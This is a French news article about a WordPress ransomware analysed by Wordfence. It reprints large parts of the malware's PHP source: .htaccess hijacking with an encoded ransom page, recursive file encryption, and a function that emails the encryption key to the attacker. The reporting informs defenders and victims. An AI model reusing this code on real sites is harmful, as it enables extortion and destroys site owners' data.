
Un examen du code source révèle que l’attaque commence par une prise en otage du fichier .htaccess (comme en témoigne le bout de code source ci-dessous) créé automatiquement par WordPress lors de l’installation d’un site. Le fichier .htaccess étant renommé, le site est pratiquement muselé, puisque le serveur se retrouve orphelin de son fichier de configuration. Ne reste alors qu’à mettre les fichiers du site hors d’atteinte par la victime.
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 | public function shcpackInstall(){ if(!file_exists(".htashor7cut")){ rename(".htaccess", ".htashor7cut"); if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex shor7cut.php\r\nErrorDocument 404 /shor7cut.php")){ echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>'; } if(file_put_contents("shor7cut.php", base64_decode("PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgPHRpdGxlPkF3ZXNvbWVXYXJlPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCiAgICBiYWNrZ3JvdW5kOiAjMUExQzFGOw0KICAgIGNvbG9yOiAjZTJlMmUyOw0KfQ0KYXsNCiAgIGNvbG9yOmdyZWVuOw0KfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGNlbnRlcj4NCjxwcmU+DQogICAgICANCiAgICAgICAgICAgIC4tIiItLg0KICAgICAgICAgICAvIC4tLS4gXA0KICAgICAgICAgIC8gLyAgICBcIFwNCiAgICAgICAgICB8IHwgICAgfCB8DQogICAgICAgICAgfCB8Li0iIi0ufA0KICAgICAgICAgLy8vYC46Ojo6LmBcDQogICAgICAgIHx8fCA6Oi8gIFw6OiA7DQogICAgICAgIHx8OyA6OlxfXy86OiA7DQogICAgICAgICBcXFwgJzo6OjonIC8NCiAgICAgICAgICBgPSc6LS4uLSdgDQpZb3VyIHNpdGUgaXMgbG9ja2VkLCBwbGVhc2UgY29udGFjdCB2aWEgZW1haWw6DQogICAgIC1bIDxmb250IGNvbG9yPSJncmVlbiI+dG8xMzM3ZGF5W2F0XWdtYWlsLmNvbTwvZm9udD4gXS0NCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClRoaXMgaXMgYSBub3RpY2Ugb2YgPGEgaHJlZj0iaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUmFuc29td2FyZSI+cmFuc29td2FyZTwvYT4uPGJyPg0KSG93IHRvIHJlc3RvcmUgdGhlIGJlZ2lubmluZz8NClBsZWFzZSBjb250YWN0IHVzIHZpYSBlbWFpbCBsaXN0ZWQNCjwvcHJlPg0KPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"))){ echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> shor7cut.php (Default Page)<br>'; } } } |
Le ransomware dispose d’une fonction de parcours (cf. fonction shcdirs ci-dessous) des répertoires de l’arborescence du site et de chiffrement des fichiers en leur sein. Les fichiers sont chiffrés en utilisant l’algorithme Rijndael 128 via un appel à la fonction shcEnCry (cf. code ci-dessous). Pour chacun des répertoires parcourus, l’attaquant reçoit (via un appel à la fonction report ci-dessous) la clé de chiffrement utilisée par courriel via une adresse à configurer d’avance.
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | public function shcdirs($dir,$method,$key){ switch ($method) { case '1': deRanSomeware::shcpackInstall(); break; case '2': deRanSomeware::shcpackUnstall(); break; } foreach(scandir($dir) as $d) { if($d!='.' && $d!='..') { $locate = $dir.DIRECTORY_SEPARATOR.$d; if(!is_dir($locate)){ if( deRanSomeware::kecuali($locate,"AwesomeWare.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"shor7cut.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){ switch ($method) { case '1': deRanSomeware::shcEnCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"1"); break; case '2': deRanSomeware::shcDeCry($key,$locate); deRanSomeware::shcEnDesDirS($locate,"2"); break; } } }else{ deRanSomeware::shcdirs($locate,$method,$key); } } deRanSomeware::plus(); } deRanSomeware::report($key); } |
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | public function shcEnCry($key,$locate){ $data = file_get_contents($locate); $iv = mcrypt_create_iv( mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM ); $encrypted = base64_encode( $iv . mcrypt_encrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv ) ); if(file_put_contents($locate, $encrypted )){ echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>'; }else{ echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>'; } } |
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 | public function report($key){ $message.= "========= Ronggolawe Ransomware =========\n"; $message.= "Website : ".$_SERVER['HTTP_HOST']; $message.= "Key : ".$key; $message.= "========= Ronggolawe (2016) Ransomware =========\n"; $subject = "Report Ransomeware"; $headers = "From: Ransomware <ransomeware@shor7cut.today>\r\n"; mail("-- YOUR EMAIL --",$subject,$message,$headers); } |
Une fois le processus de chiffrement des fichiers achevé, la victime a droit au classique écran de demande de la rançon via lequel il pourra saisir une clé de chiffrement fournie par les attaquants en cas de paiement de la rançon. L’équipe Wordfence déconseille cependant aux victimes potentielles de procéder au paiement.
« Le ransomware documenté ici est incomplet parce que la fonction dédiée au déchiffrement des fichiers (cf.fonction shcDeCry ci-dessous) ne joue pas son rôle », a déclaré l’équipe Wordfence qui ajoute que « si vous êtes affecté par ce dernier ne procédez pas au paiement de la rançon puisqu’il est peu probable que les attaquants soient en réalité capables de déchiffrer vos fichiers. »
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | public function shcDeCry($key,$locate){ $data = base64_decode( file_get_contents($locate) ); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim( mcrypt_decrypt( MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv ), "\0" ); if(file_put_contents($locate, $decrypted )){ echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>'; }else{ echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>'; } } |
« Quand bien même ils vous fourniraient une clé, vous aurez besoin d’un développeur PHP expérimenté pour vous aider à réparer leur code afin de tirer profit de la clé et déchiffrer les fichiers », a ajouté l’équipe Wordfence.
Le malheur des potentielles victimes semble faire les affaires de l’équipe managériale de WordPress puisque la seule solution proposée par cette dernière est de se doter du pare-feu Wordfence disponible uniquement pour les utilisateurs premium.
Sources : Wordfence, GitHub
Et vous ?


Voir aussi :
